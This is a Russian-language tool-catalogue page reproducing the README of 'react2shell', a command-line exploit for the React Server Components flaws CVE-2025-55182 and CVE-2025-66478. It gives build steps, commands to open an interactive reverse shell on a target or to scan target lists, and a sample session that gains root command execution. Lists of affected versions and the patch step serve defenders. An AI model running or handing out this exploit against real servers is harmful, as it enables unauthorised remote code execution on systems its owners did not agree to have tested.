Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell — CLI-инструмент, эксплуатирующий уязвимости в React Server Components и Server Actions (CVE-2025-55182, CVE-2025-66478) для достижения удаленного выполнения кода (RCE) на уязвимых серверах. | Kitploit
Инструменты/GitHubGitHub/mantvmass/react2shell
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаArchived
GitHubmantvmass/react2shell

react2shell

CLI-инструмент, эксплуатирующий уязвимости в React Server Components и Server Actions (CVE-2025-55182, CVE-2025-66478) для достижения удаленного выполнения кода (RCE) на уязвимых серверах.

Репозиторий
28 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

React2Shell

Инструмент CLI для эксплуатации уязвимостей загрязнения прототипов в React Server Components / Server Actions (CVE-2025-55182 и CVE-2025-66478), позволяющий удаленно выполнять код (RCE) на уязвимых серверах.

Исходный PoC : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

ПРЕДУПРЕЖДЕНИЕ: Этот инструмент нацелен на критическую уязвимость (CVSS 10.0), которая активно эксплуатируется в реальных условиях. Используйте только на системах, которыми вы владеете или на тестирование которых получили явное разрешение.

Правовое предупреждение

Этот инструмент предназначен исключительно для образовательных целей, авторизованного тестирования безопасности, пентеста с разрешения и исследования уязвимостей.

Автор и участники не несут никакой ответственности за любое неправомерное использование, ущерб или юридические последствия, возникшие в результате использования этого инструмента. Вы несете полную ответственность за обеспечение того, чтобы ваше использование соответствовало всем применимым законам, нормативным актам и условиям обслуживания.

Несанкционированное использование против систем без разрешения является незаконным в большинстве юрисдикций и может повлечь за собой серьезные наказания.

Установка

Из исходного кода

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

Бинарный файл будет находиться в target/release/react2shell (или react2shell.exe на Windows).

Предварительно собранные бинарные файлы

Загрузите со страницы Релизы.

Использование

root@kitploit:~
react2shell [КОМАНДА] [ИСТОЧНИК]

Команды

  • open <URL>: Открыть интерактивный reverse shell на цели (если она уязвима).
  • scan <FILE>: Сканировать список целей из файла (по одному URL на строку) на наличие уязвимости.

Примеры

root@kitploit:~
# Open interactive shell
react2shell open http://vulnerable-target.com

# Scan multiple targets
react2shell scan targets.txt

# Scan single target
react2shell scan http://127.0.0.1:3000

Примеры интерактивного shell

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # Display all supported commands
Commands;
  /new <URL> ; Switch URL target                           # Switch URL target
  /use exec ; Execute command and wait for output          # Switch to exec mode (waits for result)
  /use exec-no-wait ; Execute command without waiting      # Exec mode without waiting for output
  /use js ; Execute JavaScript code                        # Switch back to JavaScript mode
  /set timeout <ms> ; Set command timeout in milliseconds  # Configure command timeout
  /show options ; Show current configuration               # Display current shell settings
  /clear ; Clear screen                                    # Clear the terminal screen
  /exit or /quit ; Exit the shell                          # Exit the interactive shell

Examples;
  ls -la                                                 # Example Linux command
  whoami                                                 # Show current system user
  console.log('Hello')                                   # Example JavaScript command

[email protected]:3000 (js)
$ /use exec                                              # Switch from JS mode to exec mode
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # Verify current execution user
root                                                     # Command output

Затронутые версии

Next.js

Приложения, использующие React Server Components с App Router, подвержены уязвимости при работе со следующими версиями:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 and later canary releases

Следующие версии не подвержены:

  • Next.js 13.x
  • Next.js 14.x (stable releases)
  • Applications using the Pages Router
  • Edge Runtime deployments

React

Уязвимость существует в React версиях 19.0, 19.1.0, 19.1.1 и 19.2.0 в следующих пакетах:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

Настоятельно рекомендуется немедленно обновить исправленные версии, особенно в производственных средах.

Смягчение последствий

Основное исправление — обновить исправленные версии React и Next.js.

Для приложений Next.js используйте официальный автоматический исправитель:

root@kitploit:~
npx fix-react2shell-next

Подробнее: vercel-labs/fix-react2shell-next

См. официальные уведомления:

  • React: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js: https://nextjs.org/blog/CVE-2025-66478

Лицензия

Этот проект выпущен только для образовательных и авторизованных исследовательских целей в области безопасности. Вся ответственность за использование лежит на конечном пользователе.

Скачать инструмент